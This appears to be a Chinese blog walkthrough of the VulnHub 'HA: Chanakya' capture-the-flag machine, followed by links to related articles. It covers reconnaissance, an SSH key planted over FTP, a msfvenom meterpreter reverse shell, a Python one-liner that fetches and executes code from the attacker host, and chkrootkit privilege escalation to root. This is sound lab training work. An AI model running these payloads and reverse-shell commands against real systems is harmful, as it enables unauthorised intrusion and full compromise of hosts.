chanakya
仅供个人娱乐
参考http://www.saulgoodman.cn/HA-Chanakya.html
靶机信息
https://www.vulnhub.com/entry/ha-chanakya,395/
一、主机探测
arp-scan -l

nmap -sV -p 1-65535 -A 192.168.236.136

dirb http://192.168.236.136






二、漏洞的查找和利用
百度 得到ROT13的加密方式

pcap流量包,直接下载即可


ashoka kautilya
首先进行21端口登录

22端口登陆失败

创建ssh-keygen
上传.ssh 使用kali免密登录
ssh-keygen

然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中
root@kali:~/桌面# cd ~/.ssh
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

mkdir .ssh
cd.ssh
put authorized_keys

root@kali:~/.ssh# ssh ashoka@192.168.236.136

提权
先msf生成一个木马反弹一个meterpreter回话过来
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

python -m SimpleHTTPServer
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.129

cd /tmp
wget http://192.168.236.129:8000/shell.elf


sysinfo
使用post模块来查看可以利用那些提权exploit:
run post/multi/recon/local_exploit_suggester

info exploit/linux/local/netfilter_priv_esc_ipv4


失败
使用命令注入来反弹一个shell:
use exploit/multi/script/web_delivery

set lhost 192.168.236.129

python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"
在目标机运行:

使用rootkit攻击模块:

这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。
set rhosts 192.168.236.136
set session 1
set lport 8888
exploit
python -c'import pty;pty.spawn("/bin/bash")'


参考文章http://www.saulgoodman.cn/HA-Chanakya.html
chanakya的更多相关文章
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- HA: Chanakya Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 ...
随机推荐
- Linux 命令行查看etcd v2所有的Key
etcd 是一个树型的数据结构,这样看所有的key: curl localhost:2379/v2/keys 这样看某个key的内容: curl localhost:2379/v2/keys/key ...
- 5、SpringBoot整合之SpringBoot整合MybatisPlus
SpringBoot整合MybatisPlus 目录(可点击直接跳转,但还是建议按照顺序观看,四部分具有一定的关联性): 实现基础的增删改查 实现自动填充功能 实现逻辑删除 实现分页 首先给出四部分完 ...
- sed 大括号 sed {} 的作用详解
今天看别人写的脚本的时候,看到了sed -r {} 我看网上对于这个的记录比较少,所以就写了这篇随笔. 先看一下效果 cat test.txt image: qqq/www/eee:TAG ...
- Rsync+Sersync数据实时同步(双向)
Rsync+Sersync数据实时同步(双向) 服务介绍 一.为什么要用rsync+sersync架构? 1.sersync是基于inotify开发的,类似于inotify-tools的工具 2.se ...
- 包机制与javaDOC文档
包机制 包的本质就是个文件夹: 一般利用公司域名倒置作为包名:com.kuangstudy.biog javaDOC文档 package com.kuang.base; /** * @author K ...
- JAVA 类修饰符
JAVA类的修饰符主要有public,default,protected,private,final,abstract,static 其中外部类中用到的只有public,final,abstract或 ...
- linux 退出状态码
状态码 描述 0 命令成功结束 1 一般性未知错误 2 不适合的shell 命令 123 命令不可执行 127 没找到命令 128 无效退出参数 128+x 与linux信号x相关的严重错误 130 ...
- buu Youngter-drive
一.查壳,发现是upx的壳,用自解压方式,脱下壳 二.之后发现打不开了,应该是要修复,不想修复了,直接拖入ida 找到关键函数,中间发生一点小插曲,发现堆栈不平衡,然后导致F5反编译失败,百度了下是A ...
- ESP32音频输入-MAX4466,MAX9814,SPH0645LM4H,INMP441(翻译)
有几种方法可以将模拟音频数据输入到ESP32中. 直接从内置的模数转换器(ADC)读取 这对于一次性读取很有用,但不适用于高采样率. 使用I2S通过DMA读取内置ADC 适用于模拟麦克风,例如MAX4 ...
- Quzrtz.net 示例
//框架.Net Core 2.0//先用Nuget 安装最新quartz.net using System; using Quartz; using Quartz.Impl; using Syste ...